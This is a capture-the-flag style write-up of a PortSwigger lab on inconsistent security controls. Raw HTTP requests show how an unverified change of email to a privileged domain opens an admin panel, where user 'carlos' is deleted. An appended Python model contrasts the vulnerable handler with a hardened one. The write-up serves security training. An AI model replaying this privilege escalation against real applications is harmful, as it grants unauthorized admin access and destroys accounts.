
PortSwigger: Inconsistent security controls

Inconsistent security controls

Solution

Register a new user

POST /register HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=c6eyxidQftaIDP780kVsmVn6Zq8Ba6H9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://0a12005503774316e56517d100f7003a.web-security-academy.net
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/register
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=EDmd3HzPd1XcsnGZEE7QOqXwwK7nhnfW&username=pentester&email=pen%40exploit-0a15004c03e24329e5ee16b401c60027.exploit-server.net&password=qwerty

Open email client

https://exploit-0acc00cb0443e1be8333e28d019b0071.exploit-server.net/email
---
GET /register?temp-registration-token=PWwdedHT6fZH9np1RmRt58AVDtrEoNWD HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=c6eyxidQftaIDP780kVsmVn6Zq8Ba6H9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://exploit-0a15004c03e24329e5ee16b401c60027.exploit-server.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Log in to the website

POST /login HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=c6eyxidQftaIDP780kVsmVn6Zq8Ba6H9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: https://0a12005503774316e56517d100f7003a.web-security-academy.net
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=EDmd3HzPd1XcsnGZEE7QOqXwwK7nhnfW&username=pentester&password=qwerty

Change email

After changing the email, I see a new tab called "Admin panel"
---
OLD mail: pen@exploit-0a15004c03e24329e5ee16b401c60027.exploit-server.net
New mail: pentester@dontwannacry.com
---
POST /my-account/change-email HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=G83XNSn52WbUrOzMsSHLrliSD1IvRAHw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: https://0a12005503774316e56517d100f7003a.web-security-academy.net
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/my-account?id=pentester
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

email=pentester%40dontwannacry.com&csrf=i4r8vIcTTdRGBN0lhmzEEXAvzZScC4ZB
---
GET /my-account?id=pentester HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=G83XNSn52WbUrOzMsSHLrliSD1IvRAHw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/my-account?id=pentester
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Delete user: carlos

Open the website and delete user carlos
https://0a12005503774316e56517d100f7003a.web-security-academy.net/admin
---
GET /admin/delete?username=carlos HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=G83XNSn52WbUrOzMsSHLrliSD1IvRAHw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /admin HTTP/2
Host: 0a12005503774316e56517d100f7003a.web-security-academy.net
Cookie: session=G83XNSn52WbUrOzMsSHLrliSD1IvRAHw
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a12005503774316e56517d100f7003a.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Solved
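The flaw the steps above ride on is that registration proves ownership of the e-mail address with a mailed token, but the change-email handler does not, while the admin role is keyed to the address domain. The following Python is an added example, not the lab's or PortSwigger's code: a constructed account service with both the inconsistent and the hardened change handler, so the difference can be checked directly (the attacker address and the `AccountService` API are assumptions of this example).

```python
import hmac
import secrets

ADMIN_DOMAIN = "dontwannacry.com"  # the domain the lab ties to staff access

class AccountService:  # constructed toy model of the lab's account flow, not PortSwigger's code
    def __init__(self, consistent_controls: bool):
        self.consistent = consistent_controls
        self.users = {}   # username -> {"email": verified address, "pending": unverified}
        self.tokens = {}  # token -> (username, address awaiting proof of ownership)

    def register(self, username: str, email: str) -> str:
        # Registration never trusts the address until the mailed token comes back.
        self.users[username] = {"email": None, "pending": email}
        return self._issue_token(username, email)

    def change_email(self, username: str, new_email: str):
        if self.consistent:
            # Hardened: a changed address gets exactly the control a new one gets.
            self.users[username]["pending"] = new_email
            return self._issue_token(username, new_email)
        # Vulnerable: the change handler skips the check registration enforces,
        # so the domain-based role below is derived from an unverified address.
        self.users[username]["email"] = new_email
        return None

    def verify(self, token: str) -> bool:
        for known in list(self.tokens):  # single-use, constant-time comparison
            if hmac.compare_digest(known, token):
                username, email = self.tokens.pop(known)
                user = self.users[username]
                if user["pending"] == email:
                    user["email"], user["pending"] = email, None
                    return True
        return False

    def is_admin(self, username: str) -> bool:
        email = self.users[username]["email"]  # role follows the verified address only
        return email is not None and email.rsplit("@", 1)[-1] == ADMIN_DOMAIN

    def _issue_token(self, username: str, email: str) -> str:
        token = secrets.token_urlsafe(24)
        self.tokens[token] = (username, email)
        return token

def unverified_change_grants_admin(consistent_controls: bool) -> bool:
    svc = AccountService(consistent_controls)  # replay: register, verify, change, never re-verify
    svc.verify(svc.register("pentester", "pen@attacker.example"))  # constructed address
    svc.change_email("pentester", "pentester@" + ADMIN_DOMAIN)
    return svc.is_admin("pentester")
```

With the inconsistent handler the replay ends with admin rights; with the hardened one the role only changes after the token for the new address is redeemed.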